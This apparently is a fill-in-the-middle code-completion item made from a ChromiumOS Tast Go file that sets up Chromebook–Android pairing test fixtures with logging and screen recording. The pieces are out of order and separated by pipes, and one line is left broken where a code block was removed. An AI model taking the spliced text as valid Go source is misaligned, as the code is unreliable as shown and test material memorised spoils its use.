// These vars can be used from the command line when running tests locally to configure the tests to run on personal GAIA accounts.
// Use these vars to log in with your own GAIA credentials on CrOS. The Android device should be signed in with the same account.
customCrOSUsername = "cros_username"
customCrOSPassword = "cros_password"
)
// postTestTimeout is the timeout for the fixture PostTest stage.
// We need a considerable amount of time to collect an Android bug report on failure.
const postTestTimeout = resetTimeout + BugReportDuration
func init() {
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboardedAllFeatures",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with all Cross Device features enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboarded",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with default Cross Device features enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupSmartLock",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceNoSignIn",
Desc: "User is not signed in (with GAIA) to CrOS but fixture requires control of an Android phone. Does not skip OOBE",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, true, true}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
SignInProfileTestExtensionManifestKey,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboardedNoLock",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with default Cross Device features enabled. Doesn't lock the fixture before starting the test",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupSmartLockLogin",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, false, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
// lacros fixtures
testing.AddFixture(&testing.Fixture{
Name: "lacrosCrossdeviceOnboardedAllFeatures",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with all Cross Device features enabled with lacros enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return lacrosfixt.NewConfig().Opts()
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
}
type crossdeviceFixture struct {
fOpt chrome.OptionsCallback // Function to generate Chrome Options
cr *chrome.Chrome
tconn *chrome.TestConn
kb *input.KeyboardEventWriter
androidDevice *AndroidDevice
androidAttributes *AndroidAttributes
crosAttributes *crossdevicecommon.CrosAttributes
btsnoopCmd *testexec.Cmd
logMarker *logsaver.Marker // Marker for per-test log.
allFeatures bool
saveAndroidScreenRecordingOnError func(context.Context, func() bool) error
saveScreenRecording bool
lockFixture bool
noSignIn bool
logcatStartTime adb.LogcatTimestamp
downloadsPath string
}
// FixtData holds information made available to tests that specify this Fixture.
type FixtData struct {
// Chrome is the running chrome instance.
Chrome *chrome.Chrome
// TestConn is a connection to the test extension.
TestConn *chrome.TestConn
// Connection to the lock screen test extension.
LoginConn *chrome.TestConn
// AndroidDevice is an object for interacting with the connected Android device's Multidevice Snippet.
AndroidDevice *AndroidDevice
// The credentials to be used on both chromebook and phone.
Username string
Password string
// The options used to start Chrome sessions.
ChromeOptions []chrome.Option
}
func (f *crossdeviceFixture) SetUp(ctx context.Context, s *testing.FixtState) interface{} {
// Android device from parent fixture.
androidDevice := s.ParentValue().(*FixtData).AndroidDevice
f.androidDevice = androidDevice
// Credentials to use (same as Android).
crosUsername := s.ParentValue().(*FixtData).Username
crosPassword := s.ParentValue().(*FixtData).Password
// Allocate time for logging and saving a screenshot and bugreport in case of failure.
cleanupCtx := ctx
ctx, cancel := ctxutil.Shorten(ctx, 10*time.Second+BugReportDuration)
defer cancel()
// Save logcat so we have Android logs even if fixture setup fails.
startTime, err := androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
defer androidDevice.Device.DumpLogcatFromTimestamp(cleanupCtx, filepath.Join(s.OutDir(), "fixture_setup_logcat.txt"), startTime)
defer androidDevice.DumpLogs(cleanupCtx, s.OutDir(), "fixture_setup_persistent_logcat.txt")
// Set default chrome options.
opts, err := f.fOpt(ctx, s)
if err != nil {
s.Fatal("Failed to obtain Chrome options: ", err)
}
tags := []string{
"*nearby*=3",
"*cryptauth*=3",
"*device_sync*=3",
"*multidevice*=3",
"*secure_channel*=3",
"*phonehub*=3",
"*blue*=3",
"ble_*=3",
}
opts = append(opts, chrome.ExtraArgs("--enable-logging", "--vmodule="+strings.Join(tags, ",")))
opts = append(opts, chrome.EnableFeatures("PhoneHubCameraRoll", "SmartLockUIRevamp", "OobeQuickStart"))
customUser, userOk := s.Var(customCrOSUsername)
customPass, passOk := s.Var(customCrOSPassword)
if userOk && passOk {
s.Log("Logging in with user-provided credentials")
crosUsername = customUser
crosPassword = customPass
} else {
s.Log("Logging in with default GAIA credentials")
}
if f.noSignIn {
opts = append(opts, chrome.DontSkipOOBEAfterLogin())
} else {
opts = append(opts, chrome.GAIALogin(chrome.Creds{User: crosUsername, Pass: crosPassword}))
}
if val, ok := s.Var(KeepStateVar); ok {
b, err := strconv.ParseBool(val)
if err != nil {
s.Fatalf("Unable to convert %v var to bool: %v", KeepStateVar, err)
}
if b {
opts = append(opts, chrome.KeepState())
}
}
cr, err := chrome.New(
ctx,
opts...,
)
if err != nil {
s.Fatal("Failed to start Chrome: ", err)
}
f.cr = cr
tconn, err := cr.TestAPIConn(ctx)
if err != nil {
s.Fatal("Creating test API connection failed: ", err)
}
f.tconn = tconn
defer faillog.DumpUITreeWithScreenshotOnError(cleanupCtx, s.OutDir(), s.HasError, cr, "fixture")
// Capture a bug report on the Android phone if any onboarding/setup fails.
defer func() {
if s.HasError() {
if err := BugReport(ctx, androidDevice.Device, s.OutDir()); err != nil {
s.Log("Failed to save Android bug report: ", err)
}
}
}()
// Capture btsnoop logs during fixture setup to have adequate logging during the onboarding phase.
btsnoopCmd := bluetooth.StartBTSnoopLogging(ctx, filepath.Join(s.OutDir(), "crossdevice-fixture-btsnoop.log"))
if err := btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
defer btsnoopCmd.Wait()
defer btsnoopCmd.Kill()
// Enable bluetooth debug logging.
levels := bluetooth.LogVerbosity{
Bluez: true,
Kernel: true,
}
if err := bluetooth.SetDebugLogLevels(ctx, levels); err != nil {
return errors.Wrap(err, "failed to enable bluetooth debug logging")
}
// Phone and Chromebook will not be paired if we are not signed in to the Chromebook yet.
if !f.noSignIn {
// Sometimes during login the tcp connection to the snippet server on Android is lost.
// If the Pair RPC fails, reconnect to the snippet server and try again.
if err := f.PairWithAndroid(ctx, tconn, cr); err != nil {
s.Fatal("Pairing with Android failed: ", err)
}
if f.allFeatures {
// Wait for the "Smart Lock is turned on" notification to appear,
// since it will cause Phone Hub to close if it's open before the notification pops up.
if _, err := ash.WaitForNotification(ctx, tconn, 30*time.Second, ash.WaitTitleContains("Smart Lock is turned on")); err != nil {
s.Log("Smart Lock notification did not appear after 30 seconds, proceeding anyways")
}
if err := phonehub.Enable(ctx, tconn, cr); err != nil {
s.Fatal("Failed to enable Phone Hub: ", err)
}
if err := phonehub.Hide(ctx, tconn); err != nil {
s.Fatal("Failed to hide Phone Hub after enabling it: ", err)
}
if err := androidDevice.EnablePhoneHubNotifications(ctx); err != nil {
s.Fatal("Failed to enable Phone Hub notifications: ", err)
}
}
if _, err := ash.WaitForNotification(ctx, tconn, 90*time.Second, ash.WaitTitleContains("Connected to")); err != nil {
s.Fatal("Did not receive notification that Chromebook and Phone are paired")
}
}
// Store Android attributes for reporting.
androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
if err != nil {
s.Fatal("Failed to get Android attributes for reporting: ", err)
}
f.androidAttributes = androidAttributes
// Store CrOS test metadata for reporting.
crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
if err != nil {
s.Fatal("Failed to get CrOS attributes for reporting: ", err)
}
f.crosAttributes = crosAttributes
// Get the user's Download path for saving screen recordings.
f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
if err != nil {
s.Fatal("Failed to get user's Downloads path: ", err)
}
// Lock chrome after all Setup is complete so we don't block other fixtures.
if f.lockFixture {
chrome.Lock()
}
return &FixtData{
Chrome: cr,
TestConn: tconn,
AndroidDevice: androidDevice,
Username: crosUsername,
Password: crosPassword,
ChromeOptions: opts,
}
}
func (f *crossdeviceFixture) TearDown(ctx context.Context, s *testing.FixtState) {
if f.lockFixture {
chrome.Unlock()
if err := f.cr.Close(ctx); err != nil {
s.Log("Failed to close Chrome connection: ", err)
}
}
f.cr = nil
}
func (f *crossdeviceFixture) Reset(ctx context.Context) error {
if err := f.cr.Responded(ctx); err != nil {
return errors.Wrap(err, "existing Chrome connection is unusable")
}
if err := f.cr.ResetState(ctx); err != nil {
return errors.Wrap(err, "failed resetting existing Chrome session")
}
return nil
}
func (f *crossdeviceFixture) PreTest(ctx context.Context, s *testing.FixtTestState) {
if err := saveDeviceAttributes(f.crosAttributes, f.androidAttributes, filepath.Join(s.OutDir(), "device_attributes.json")); err != nil {
s.Error("Failed to save device attributes: ", err)
}
f.btsnoopCmd = bluetooth.StartBTSnoopLogging(s.TestContext(), filepath.Join(s.OutDir(), "crossdevice-btsnoop.log"))
if err := f.btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
if f.logMarker != nil {
s.Log("A log marker is already created but not cleaned up")
}
logMarker, err := logsaver.NewMarker(f.cr.LogFilename())
if err == nil {
f.logMarker = logMarker
} else {
s.Log("Failed to start the log saver: ", err)
}
timestamp, err := f.androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
f.logcatStartTime = timestamp
if f.saveScreenRecording {
if f.kb == nil {
// Use virtual keyboard since uiauto.StartRecordFromKB assumes F5 is the overview key.
kb, err := input.VirtualKeyboard(ctx)
if err != nil {
s.Fatal("Failed to setup keyboard for screen recording: ", err)
}
f.kb = kb
}
if err := uiauto.StartRecordFromKB(ctx, f.tconn, f.kb, f.downloadsPath); err != nil {
s.Fatal("Failed to start screen recording on CrOS: ", err)
}
saveScreen, err := f.androidDevice.StartScreenRecording(s.TestContext(), "android-screen", s.OutDir())
if err != nil {
s.Fatal("Failed to start screen recording on Android: ", err)
}
f.saveAndroidScreenRecordingOnError = saveScreen
}
}
func (f *crossdeviceFixture) PostTest(ctx context.Context, s *testing.FixtTestState) {
if err := f.btsnoopCmd.Kill(); err != nil {
s.Error("Failed to stop btsnoop log capture: ", err)
}
f.btsnoopCmd.Wait()
f.btsnoopCmd = nil
if f.logMarker != nil {
if err := f.logMarker.Save(filepath.Join(s.OutDir(), "chrome.log")); err != nil {
s.Log("Failed to store per-test log data: ", err)
}
f.logMarker = nil
}
// Restore connection to the ADB-over-WiFi device if it was lost during the test.
// This is needed for Instant Tether tests that disable WiFi on the Chromebook which interrupts the ADB connection.
if PhoneIP.Value() != "" && f.androidDevice.Device.IsConnected(ctx) != nil {
s.Log("Connection to ADB device lost, restaring")
device, err := AdbOverWifi(ctx)
if err != nil {
s.Fatal("Failed to re-initialize adb-over-wifi: ", err)
}
f.androidDevice.Device = device
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
s.Fatal("Failed to reconnect to the snippet: ", err)
}
}
if err := f.androidDevice.Device.DumpLogcatFromTimestamp(ctx, filepath.Join(s.OutDir(), "crossdevice-logcat.txt"), f.logcatStartTime); err != nil {
s.Fatal("Failed to save logcat logs from the test: ", err)
}
if err := f.androidDevice.DumpLogs(ctx, s.OutDir(), "crossdevice-persistent-logcat.txt"); err != nil {
s.Fatal("Failed to save persistent logcat logs: ", err)
}
if f.saveScreenRecording {
if err := f.saveAndroidScreenRecordingOnError(ctx, s.HasError); err != nil {
s.Fatal("Failed to save Android screen recording: ", err)
}
f.saveAndroidScreenRecordingOnError = nil
ui := uiauto.New(f.tconn)
var crosRecordErr error
if err := ui.Exists(uiauto.ScreenRecordStopButton)(ctx); err != nil | else {
crosRecordErr = uiauto.StopRecordFromKBAndSaveOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
}
if crosRecordErr != nil {
s.Fatal("Failed to save CrOS screen recording: ", crosRecordErr)
}
}
if s.HasError() {
if err := BugReport(ctx, f.androidDevice.Device, s.OutDir()); err != nil {
s.Error("Failed to save Android bug report: ", err)
}
}
}
// Verify that pairing between Android and Chromebook is successful.
func (f *crossdeviceFixture) PairWithAndroid(ctx context.Context, tconn *chrome.TestConn, cr *chrome.Chrome) error {
if err := f.androidDevice.Pair(ctx); err != nil {
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
return errors.Wrap(err, "failed to reconnect to the snippet server")
}
if err := f.androidDevice.Pair(ctx); err != nil {
return errors.Wrap(err, "failed to connect the Android device to CrOS")
}
}
if err := crossdevicesettings.WaitForConnectedDevice(ctx, tconn, cr); err != nil {
return errors.Wrap(err, "failed waiting for the connected device to appear in OS settings")
}
return nil
}
// saveDeviceAttributes saves the CrOS and Android device attributes as a formatted JSON at the specified filepath.
func saveDeviceAttributes(crosAttrs *crossdevicecommon.CrosAttributes, androidAttrs *AndroidAttributes, filepath string) error {
attributes := struct {
CrOS *crossdevicecommon.CrosAttributes
Android *AndroidAttributes
}{CrOS: crosAttrs, Android: androidAttrs}
crosLog, err := json.MarshalIndent(attributes, "", "\t")
if err != nil {
return errors.Wrap(err, "failed to format device metadata for logging")
}
if err := ioutil.WriteFile(filepath, crosLog, 0644); err != nil {
return errors.Wrap(err, "failed to write CrOS attributes to output file")
}
return nil
}
// ConnectToWifi connects the chromebook to the Wifi network in its RF box.
func ConnectToWifi(ctx context.Context) error {
if err := testing.Poll(ctx, func(ctx context.Context) error {
out, err := testexec.CommandContext(ctx, "/usr/local/autotest/cros/scripts/wifi", "connect", "nearbysharing_1", "password").CombinedOutput(testexec.DumpLogOnError)
if err != nil {
if strings.Contains(string(out), "already connected") {
testing.ContextLog(ctx, "Already connected to wifi network")
return nil
}
return errors.Wrap(err, "failed to connect CrOS device to Wifi")
}
return nil
}, &testing.PollOptions{Timeout: 20 * time.Second, Interval: 3 * time.Second}); err != nil {
return errors.Wrap(err, "failed to connect to wifi")
}
return nil
}
| {
// Smart Lock tests automatically stop the screen recording when they lock the screen.
// The screen recording should still exist though.
crosRecordErr = uiauto.SaveRecordFromKBOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
} | conditional_block |
fixture.go | // Copyright 2021 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package crossdevice
import (
"context"
"encoding/json"
"io/ioutil"
"path/filepath"
"strconv"
"strings"
"time"
"chromiumos/tast/common/android/adb"
crossdevicecommon "chromiumos/tast/common/cros/crossdevice"
"chromiumos/tast/common/testexec"
"chromiumos/tast/ctxutil"
"chromiumos/tast/errors"
"chromiumos/tast/local/bluetooth"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/chrome/ash"
"chromiumos/tast/local/chrome/crossdevice/crossdevicesettings"
"chromiumos/tast/local/chrome/crossdevice/phonehub"
"chromiumos/tast/local/chrome/lacros/lacrosfixt"
"chromiumos/tast/local/chrome/uiauto"
"chromiumos/tast/local/chrome/uiauto/faillog"
"chromiumos/tast/local/cryptohome"
"chromiumos/tast/local/input"
"chromiumos/tast/local/logsaver"
"chromiumos/tast/testing"
)
// FixtureOptions contains the options that we set for various crossDeviceFixture.
type FixtureOptions struct {
allFeatures bool // Whether or not to enable all cross device features.
saveScreenRecording bool
lockFixture bool // Whether or not to lock the fixture preventing chrome from being torn down outside of fixture teardown.
noSignIn bool // Whether or not to sign in with the specified GAIA account. True will not skip OOBE.
}
// NewCrossDeviceOnboarded creates a fixture that logs in to CrOS, pairs it with an Android device,
// and ensures the features in the "Connected devices" section of OS Settings are ready to use (Smart Lock, Phone Hub, etc.).
// Note that crossdevice fixtures inherit from crossdeviceAndroidSetup.
func NewCrossDeviceOnboarded(opt FixtureOptions, fOpt chrome.OptionsCallback) testing.FixtureImpl {
return &crossdeviceFixture{
fOpt: fOpt,
allFeatures: opt.allFeatures,
saveScreenRecording: opt.saveScreenRecording,
lockFixture: opt.lockFixture,
noSignIn: opt.noSignIn,
}
}
// Fixture runtime variables.
const (
// These vars can be used from the command line when running tests locally to configure the tests to run on personal GAIA accounts.
// Use these vars to log in with your own GAIA credentials on CrOS. The Android device should be signed in with the same account.
customCrOSUsername = "cros_username"
customCrOSPassword = "cros_password"
)
// postTestTimeout is the timeout for the fixture PostTest stage.
// We need a considerable amount of time to collect an Android bug report on failure.
const postTestTimeout = resetTimeout + BugReportDuration
func init() {
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboardedAllFeatures",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with all Cross Device features enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboarded",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with default Cross Device features enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupSmartLock",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceNoSignIn",
Desc: "User is not signed in (with GAIA) to CrOS but fixture requires control of an Android phone. Does not skip OOBE",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, true, true}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
SignInProfileTestExtensionManifestKey,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
testing.AddFixture(&testing.Fixture{
Name: "crossdeviceOnboardedNoLock",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with default Cross Device features enabled. Doesn't lock the fixture before starting the test",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupSmartLockLogin",
Impl: NewCrossDeviceOnboarded(FixtureOptions{false, false, false, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return nil, nil
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
// lacros fixtures
testing.AddFixture(&testing.Fixture{
Name: "lacrosCrossdeviceOnboardedAllFeatures",
Desc: "User is signed in (with GAIA) to CrOS and paired with an Android phone with all Cross Device features enabled with lacros enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return lacrosfixt.NewConfig().Opts()
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
}
type crossdeviceFixture struct {
fOpt chrome.OptionsCallback // Function to generate Chrome Options
cr *chrome.Chrome
tconn *chrome.TestConn
kb *input.KeyboardEventWriter
androidDevice *AndroidDevice
androidAttributes *AndroidAttributes
crosAttributes *crossdevicecommon.CrosAttributes
btsnoopCmd *testexec.Cmd
logMarker *logsaver.Marker // Marker for per-test log.
allFeatures bool
saveAndroidScreenRecordingOnError func(context.Context, func() bool) error
saveScreenRecording bool
lockFixture bool
noSignIn bool
logcatStartTime adb.LogcatTimestamp
downloadsPath string
}
// FixtData holds information made available to tests that specify this Fixture.
type FixtData struct {
// Chrome is the running chrome instance.
Chrome *chrome.Chrome
// TestConn is a connection to the test extension.
TestConn *chrome.TestConn
// Connection to the lock screen test extension.
LoginConn *chrome.TestConn
// AndroidDevice is an object for interacting with the connected Android device's Multidevice Snippet.
AndroidDevice *AndroidDevice
// The credentials to be used on both chromebook and phone.
Username string
Password string
// The options used to start Chrome sessions.
ChromeOptions []chrome.Option
}
func (f *crossdeviceFixture) SetUp(ctx context.Context, s *testing.FixtState) interface{} {
// Android device from parent fixture.
androidDevice := s.ParentValue().(*FixtData).AndroidDevice
f.androidDevice = androidDevice
// Credentials to use (same as Android).
crosUsername := s.ParentValue().(*FixtData).Username
crosPassword := s.ParentValue().(*FixtData).Password
// Allocate time for logging and saving a screenshot and bugreport in case of failure.
cleanupCtx := ctx
ctx, cancel := ctxutil.Shorten(ctx, 10*time.Second+BugReportDuration)
defer cancel()
// Save logcat so we have Android logs even if fixture setup fails.
startTime, err := androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
defer androidDevice.Device.DumpLogcatFromTimestamp(cleanupCtx, filepath.Join(s.OutDir(), "fixture_setup_logcat.txt"), startTime)
defer androidDevice.DumpLogs(cleanupCtx, s.OutDir(), "fixture_setup_persistent_logcat.txt")
// Set default chrome options.
opts, err := f.fOpt(ctx, s)
if err != nil {
s.Fatal("Failed to obtain Chrome options: ", err)
}
tags := []string{
"*nearby*=3",
"*cryptauth*=3",
"*device_sync*=3",
"*multidevice*=3",
"*secure_channel*=3",
"*phonehub*=3",
"*blue*=3",
"ble_*=3",
}
opts = append(opts, chrome.ExtraArgs("--enable-logging", "--vmodule="+strings.Join(tags, ",")))
opts = append(opts, chrome.EnableFeatures("PhoneHubCameraRoll", "SmartLockUIRevamp", "OobeQuickStart"))
customUser, userOk := s.Var(customCrOSUsername)
customPass, passOk := s.Var(customCrOSPassword)
if userOk && passOk {
s.Log("Logging in with user-provided credentials")
crosUsername = customUser
crosPassword = customPass
} else {
s.Log("Logging in with default GAIA credentials")
}
if f.noSignIn {
opts = append(opts, chrome.DontSkipOOBEAfterLogin())
} else {
opts = append(opts, chrome.GAIALogin(chrome.Creds{User: crosUsername, Pass: crosPassword}))
}
if val, ok := s.Var(KeepStateVar); ok {
b, err := strconv.ParseBool(val)
if err != nil {
s.Fatalf("Unable to convert %v var to bool: %v", KeepStateVar, err)
}
if b {
opts = append(opts, chrome.KeepState())
}
}
cr, err := chrome.New(
ctx,
opts...,
)
if err != nil {
s.Fatal("Failed to start Chrome: ", err)
}
f.cr = cr
tconn, err := cr.TestAPIConn(ctx)
if err != nil {
s.Fatal("Creating test API connection failed: ", err)
}
f.tconn = tconn
defer faillog.DumpUITreeWithScreenshotOnError(cleanupCtx, s.OutDir(), s.HasError, cr, "fixture")
// Capture a bug report on the Android phone if any onboarding/setup fails.
defer func() {
if s.HasError() {
if err := BugReport(ctx, androidDevice.Device, s.OutDir()); err != nil {
s.Log("Failed to save Android bug report: ", err)
}
}
}()
// Capture btsnoop logs during fixture setup to have adequate logging during the onboarding phase.
btsnoopCmd := bluetooth.StartBTSnoopLogging(ctx, filepath.Join(s.OutDir(), "crossdevice-fixture-btsnoop.log"))
if err := btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
defer btsnoopCmd.Wait()
defer btsnoopCmd.Kill()
// Enable bluetooth debug logging.
levels := bluetooth.LogVerbosity{
Bluez: true,
Kernel: true,
}
if err := bluetooth.SetDebugLogLevels(ctx, levels); err != nil {
return errors.Wrap(err, "failed to enable bluetooth debug logging")
}
// Phone and Chromebook will not be paired if we are not signed in to the Chromebook yet.
if !f.noSignIn {
// Sometimes during login the tcp connection to the snippet server on Android is lost.
// If the Pair RPC fails, reconnect to the snippet server and try again.
if err := f.PairWithAndroid(ctx, tconn, cr); err != nil {
s.Fatal("Pairing with Android failed: ", err)
}
if f.allFeatures {
// Wait for the "Smart Lock is turned on" notification to appear,
// since it will cause Phone Hub to close if it's open before the notification pops up.
if _, err := ash.WaitForNotification(ctx, tconn, 30*time.Second, ash.WaitTitleContains("Smart Lock is turned on")); err != nil {
s.Log("Smart Lock notification did not appear after 30 seconds, proceeding anyways")
}
if err := phonehub.Enable(ctx, tconn, cr); err != nil {
s.Fatal("Failed to enable Phone Hub: ", err)
}
if err := phonehub.Hide(ctx, tconn); err != nil {
s.Fatal("Failed to hide Phone Hub after enabling it: ", err)
}
if err := androidDevice.EnablePhoneHubNotifications(ctx); err != nil {
s.Fatal("Failed to enable Phone Hub notifications: ", err)
}
}
if _, err := ash.WaitForNotification(ctx, tconn, 90*time.Second, ash.WaitTitleContains("Connected to")); err != nil {
s.Fatal("Did not receive notification that Chromebook and Phone are paired")
}
}
// Store Android attributes for reporting.
androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
if err != nil {
s.Fatal("Failed to get Android attributes for reporting: ", err)
}
f.androidAttributes = androidAttributes
// Store CrOS test metadata for reporting.
crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
if err != nil {
s.Fatal("Failed to get CrOS attributes for reporting: ", err)
}
f.crosAttributes = crosAttributes
// Get the user's Download path for saving screen recordings.
f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
if err != nil {
s.Fatal("Failed to get user's Downloads path: ", err)
}
// Lock chrome after all Setup is complete so we don't block other fixtures.
if f.lockFixture {
chrome.Lock()
}
return &FixtData{
Chrome: cr,
TestConn: tconn,
AndroidDevice: androidDevice,
Username: crosUsername,
Password: crosPassword,
ChromeOptions: opts,
}
}
func (f *crossdeviceFixture) TearDown(ctx context.Context, s *testing.FixtState) {
if f.lockFixture {
chrome.Unlock()
if err := f.cr.Close(ctx); err != nil {
s.Log("Failed to close Chrome connection: ", err)
}
}
f.cr = nil
}
func (f *crossdeviceFixture) Reset(ctx context.Context) error {
if err := f.cr.Responded(ctx); err != nil {
return errors.Wrap(err, "existing Chrome connection is unusable")
}
if err := f.cr.ResetState(ctx); err != nil {
return errors.Wrap(err, "failed resetting existing Chrome session")
}
return nil
}
func (f *crossdeviceFixture) PreTest(ctx context.Context, s *testing.FixtTestState) {
if err := saveDeviceAttributes(f.crosAttributes, f.androidAttributes, filepath.Join(s.OutDir(), "device_attributes.json")); err != nil {
s.Error("Failed to save device attributes: ", err)
}
f.btsnoopCmd = bluetooth.StartBTSnoopLogging(s.TestContext(), filepath.Join(s.OutDir(), "crossdevice-btsnoop.log"))
if err := f.btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
